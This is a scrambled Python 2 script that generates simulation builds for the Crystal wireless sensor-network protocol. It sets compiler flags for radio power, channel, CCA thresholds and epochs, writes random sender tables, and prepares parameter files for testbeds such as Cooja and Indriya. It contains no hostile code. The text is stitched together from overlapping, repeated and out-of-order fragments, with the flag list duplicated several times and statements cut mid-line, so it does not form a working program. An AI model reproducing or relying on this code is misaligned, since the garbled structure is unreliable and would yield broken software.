f.write(generate_table_array(nodes,", "\"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags", "= args.config def rnd_unique(nodes, n): l = 0 r = [] while (l<n):", "\"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ]", "concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname", "num_epochs, concurrent_txs): tbl = [] if seed is not None: random.seed(seed) for _", "+= [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l = 0 r", "num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas,", "dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y", "not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x for x", "l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink node doesn't", "cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop", "v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\")", "def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed is not None: random.seed(seed)", "return new_env glb = {} pars = {} execfile(params, glb, pars) def set_defaults(dst,", "pars = {} execfile(params, glb, pars) def set_defaults(dst, src): for k,v in src.items():", "f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except", "= 0 for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers,", "active_epochs, num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders)", "env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath,", "OrderedDict from shutil import copy, rmtree import traceback import subprocess import itertools import", "\"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l =", "args.config def rnd_unique(nodes, n): l = 0 r = [] while (l<n): x", "1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e print \"%d simulation(s)", "{} execfile(params, glb, pars) def set_defaults(dst, src): for k,v in src.items(): if k", "cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"):", "f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel,", "[ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t,", "dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip", "\"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\",", "\"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z,", "open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir)", "else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return", "ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\",", "{} pars = {} execfile(params, glb, pars) def set_defaults(dst, src): for k,v in", "if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink node doesn't exist\")", "concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name", "= nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file", "e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n in", "[\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed", "namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults = {", "if nodemap != \"all\": with open(nodemap_txt) as f: for l in f: l", "set_defaults(pars, defaults) print \"using the following params\" print pars globals().update(pars) print \"--- Preparing", "\"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if", "\"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if", "cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed ==", "following params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes = set()", "+= [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed", "p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"]", "= sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] =", "{%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs,", "\".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except", "copy, rmtree import traceback import subprocess import itertools import re import random basepath", "cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"]", "longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period,", "k,v in src.items(): if k not in dst: dst[k] = v CcaTuple =", "x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e:", "= os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes,", "def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel,", "#!/usr/bin/env python2.7 import sys import argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath',", "num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict() p[\"testbed\"]", "in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca", "= active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] =", "os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name =", "p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"]", "if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\",", "\"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\"", "if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags", "\"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags}", "num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with", "dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed,", "+ \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd()", "in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes:", "if x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders,", "n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def", "in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\",", "\" \".join(p.keys()) values = \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values)", "\"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm,", "as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir)", "nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel,", "f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir):", "l in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in", "y z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)],", "\"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging:", "namedtuple(\"NemptyTuple\", \"r y z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2,", "if nodemap != \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not", "= os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name", "} set_defaults(pars, defaults) print \"using the following params\" print pars globals().update(pars) print \"---", "nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty)", "p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys())", "import argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path')", "file does not exist: \" + nodemap_txt) nodes = set(all_nodes) if nodemap !=", "with open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name,", "xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for", "nodes = set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as f: for l", "open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] =", "with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"],", "sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir", "node doesn't exist\") all_senders = [x for x in nodes if x!=sink] new_env", "= os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")]", "0 r = [] while (l<n): x = random.choice(nodes) if x not in", "= [] while (l<n): x = random.choice(nodes) if x not in r: r.append(x)", "\"w\") as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name,", "[x for x in nodes if x!=sink] new_env = mk_env(power, channel, sink, num_senders,", "re import random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath =", "#\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, }", "period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z,", "as f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] =", "p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"]", "not None: random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static", "with open(nodemap_txt) as f: for l in f: l = l.strip() if l:", "open(\"nodelist.txt\") as f: for l in f: l = l.strip() if l: all_nodes.add(int(l.strip()))", "default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args()", "from shutil import copy, rmtree import traceback import subprocess import itertools import re", "copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty,", "set_defaults(dst, src): for k,v in src.items(): if k not in dst: dst[k] =", "Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for l in", "!= \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist: \"", "\"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags", "\"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed", "\"--- Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for l", "p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"]", "NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t,", "\"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"]", "------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for l in f: l", "x in nodes if x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty,", "= power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] =", "sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes,", "p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"]", "#apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\",", "+ \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name,", "subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\")", "(\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags =", "exist\") all_senders = [x for x in nodes if x!=sink] new_env = mk_env(power,", "pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e", "is not None: random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return", "\"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path +=", "generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file')", "os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n):", "\"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip,", "l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders", "not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist: \" + nodemap_txt) nodes", "testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap", "p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"]", "= \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum +=", "args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath =", "payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop)", "header = \" \".join(p.keys()) values = \" \".join([str(x) for x in p.values()]) f.write(header)", "f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e", "[\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb =", "\"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else:", "p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"]", "from collections import namedtuple, OrderedDict from shutil import copy, rmtree import traceback import", "python file') args = ap.parse_args() import os from collections import namedtuple, OrderedDict from", "\"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty,", "prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes", "2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars,", "import random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath,", "\"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r,", "os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist: \" + nodemap_txt) nodes =", "= seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] =", "cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in", "100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following", "[\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l = 0 r =", "\"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \"", "num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir =", "nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders =", "x = random.choice(nodes) if x not in r: r.append(x) l += 1 return", "simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip,", "return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name =", "abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd =", "channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap", "= boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values = \" \".join([str(x)", "import traceback import subprocess import itertools import re import random basepath = args.basepath", "for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir)", "num_senders, longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs,", "longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps):", "nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name", "os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt):", "f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs", "all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap)", "nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n in nodes:", "\".join(p.keys()) values = \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\")", "Exception(\"Node map file does not exist: \" + nodemap_txt) nodes = set(all_nodes) if", "continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt): raise", "x not in r: r.append(x) l += 1 return r def generate_table_array(nodes, num_epochs,", "(l<n): x = random.choice(nodes) if x not in r: r.append(x) l += 1", "= \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return 